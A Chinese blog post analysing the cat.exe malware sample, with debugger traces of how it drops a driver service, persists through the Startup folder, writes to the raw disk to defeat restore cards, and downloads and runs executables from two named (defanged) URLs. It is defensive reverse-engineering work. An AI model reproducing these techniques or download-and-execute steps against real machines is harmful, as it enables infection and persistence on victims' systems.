知道安全

FROM:http://hi.baidu.com/cyto/blog/item/5fcbeafd892f0e41d6887d52.html

cat.exe

来源参考:http://www.scanw.com/blog/?p=5

0.请参考该文描述:
http://bbs.micropoint.com.cn/showthread.asp?tid=28056&fpage=1
该样本被执行后，将驱动文件“~46.tmp”（46是一个随机值）释放到％Temp％目录下，调用SCM写注册表将~46.tmp注册成名为 sys_flt的windows内核服务,并通过相关API启动；服务启动后创建磁盘设备“\Device\yyy2”，创建目录对象“\Device\ zzz”,通过函数DeviceIoControl调用相关控制码得到主DOS分区信息并获取设备号后关闭句柄；拷贝自身到开始->附件-> 启动组中，打开设备“\Device\yyy2”通过DeviceIoControl传递自身控制码8000F800访问物理磁盘，利用 CopyFileA函数将“%Temp%\~46.tmp”及启动组中的病毒文件拷贝到“\\.\yyy2”中，以达到突破还原卡的目的；在“% SystemRoot%\System32\”下释放批处理文件Deletedll.bat，执行后删除“%Temp%\~46.tmp”和 Deletedll.bat；病毒调用API函数URLDownloadToFileA从网络上下载各种病毒到系统磁盘根目录下并执行。

1.释放文件:
00405D52     E8 55E9FFFF              call 004046AC                             ; jmp to kernel32.CreateFileA
00405D8D     E8 2AE9FFFF              call 004046BC                             ; jmp to kernel32.WriteFile
(ASCII “C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp”)

2.创建服务:
00406165     B8 90614000              mov eax,406190                            ; ASCII “sys_flt”
0040616A     E8 D5EAFFFF              call 00404C44                             ; dumped_.00404C44
0012FEFC    00404CBB   /CALL to CreateServiceA from dumped_.00404CB6
0012FF00    0013CC08   |hManager = 0013CC08
0012FF04    00406190   |ServiceName = “sys_flt”
0012FF08    00406190   |DisplayName = “sys_flt”
0012FF0C    000F01FF   |DesiredAccess = SERVICE_ALL_ACCESS
0012FF10    00000002   |ServiceType = SERVICE_FILE_SYSTEM_DRIVER
0012FF14    00000003   |StartType = SERVICE_DEMAND_START
0012FF18    00000001   |ErrorControl = SERVICE_ERROR_NORMAL
0012FF1C    00C90138   |BinaryPathName = “C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp”
0012FF20    00000000   |LoadOrderGroup = NULL
0012FF24    00000000   |pTagId = NULL
0012FF28    00000000   |pDependencies = NULL
0012FF2C    00000000   |ServiceStartName = NULL
0012FF30    00000000   \Password = NULL

3.拷贝到启动项:
0012FF38    00406091   /CALL to CopyFileA from dumped_.0040608C
0012FF3C    00C90048   |ExistingFileName = “c:\documents and settings\gao1\”,D7,”",C0,”",C3,”",E6,”\dumped_.exe”
0012FF40    00C92D04   |NewFileName = “C:\Documents and Settings\All Users\”,A1,”",B8,”",BF,”",AA,”",CA,”",BC,”",A1,”",B9,”",B2,”",CB,”",B5,”",A5,”\”,B3,”",CC,”",D0,”",F2,”\”,C6,”",F4,”",B6,”",AF,”\dumped_.exe”
0012FF44    00000000   \FailIfExists = FALSE

00C92D04 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 C:\Documents and
00C92D14 20 53 65 74 74 69 6E 67 73 5C 41 6C 6C 20 55 73   Settings\All Us
00C92D24 65 72 73 5C A1 B8 BF AA CA BC A1 B9 B2 CB B5 A5 ers\「开始」菜单
00C92D34 5C B3 CC D0 F2 5C C6 F4 B6 AF 5C 64 75 6D 70 65 \程序\启动\dumpe
00C92D44 64 5F 2E 65 78 65 00                             d_.exe.

4.利用CopyFileA函数将启动组中的病毒文件拷贝到创建的设备“\\.\yyy2”中
004056EF     50                       push eax
004056F0     E8 DFEFFFFF              call 004046D4                             ; jmp to kernel32.CopyFileA
0012FEE8    004056F5   /CALL to CopyFileA from dumped_.004056F0
0012FEEC    00C92D04   |ExistingFileName = “C:\Documents and Settings\All Users\”,A1,”",B8,”",BF,”",AA,”",CA,”",BC,”",A1,”",B9,”",B2,”",CB,”",B5,”",A5,”\”,B3,”",CC,”",D0,”",F2,”\”,C6,”",F4,”",B6,”",AF,”\dumped_.exe”
0012FEF0    00C92E28   |NewFileName = “\\.\yyy2\Documents and Settings\All Users\”,A1,”",B8,”",BF,”",AA,”",CA,”",BC,”",A1,”",B9,”",B2,”",CB,”",B5,”",A5,”\”,B3,”",CC,”",D0,”",F2,”\”,C6,”",F4,”",B6,”",AF,”\dumped_.exe”
0012FEF4    00000000   \FailIfExists = FALSE

00C92D04 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 C:\Documents and
00C92D14 20 53 65 74 74 69 6E 67 73 5C 41 6C 6C 20 55 73   Settings\All Us
00C92D24 65 72 73 5C A1 B8 BF AA CA BC A1 B9 B2 CB B5 A5 ers\「开始」菜单
00C92D34 5C B3 CC D0 F2 5C C6 F4 B6 AF 5C 64 75 6D 70 65 \程序\启动\dumpe
00C92D44 64 5F 2E 65 78 65 00 00                          d_.exe..

00C92E28 5C 5C 2E 5C 79 79 79 32 5C 44 6F 63 75 6D 65 6E \\.\yyy2\Documen
00C92E38 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C ts and Settings\
00C92E48 41 6C 6C 20 55 73 65 72 73 5C A1 B8 BF AA CA BC All Users\「开始
00C92E58 A1 B9 B2 CB B5 A5 5C B3 CC D0 F2 5C C6 F4 B6 AF 」菜单\程序\启动
00C92E68 5C 64 75 6D 70 65 64 5F 2E 65 78 65 00 00 00 00 \dumped_.exe….

据说这点就是用来突破还原的.
对于如何创建设备\\.\yyy2的过程以及原理不甚了解.

5.扫尾:卸载服务,删除驱动
卸载服务:
004061B1     B8 DC614000              mov eax,4061DC                            ; ASCII “sys_flt”
004061B6     E8 DDEBFFFF              call 00404D98                             ; dumped_.00404D98

删除驱动:
00405F6A     E8 55E7FFFF              call 004046C4                             ; jmp to kernel32.DeleteFileA
0012FF70    00405F6F   /CALL to DeleteFileA from dumped_.00405F6A
0012FF74    00C90138   \FileName = “C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp”

6.下载文件,然后退出:
0040703E     68 D8704000              push 4070D8            ; ASCII “c:\1.exe”
00407043     68 E4704000              push 4070E4            ; ASCII “hxxp://iii.chsip.net/listtt.exe”
00407048     6A 00                    push 0
0040704A     E8 05FFFFFF              call 00406F54           ; jmp to urlmon.URLDownloadToFileA
0040704F     68 D8704000              push 4070D8             ; ASCII “c:\1.exe”
00407054     E8 03FFFFFF              call 00406F5C           ; jmp to kernel32.WinExec

0040705D     68 28714000              push 407128              ; ASCII “c:\2.exe”
00407062     68 34714000              push 407134              ; ASCII “hxxp://test.591jx.com/test.exe”
00407067     6A 00                    push 0
00407069     E8 E6FEFFFF              call 00406F54            ; jmp to urlmon.URLDownloadToFileA
0040706E     68 28714000              push 407128              ; ASCII “c:\2.exe”
00407073     E8 E4FEFFFF              call 00406F5C            ; jmp to kernel32.WinExec

Popularity: 9% [?]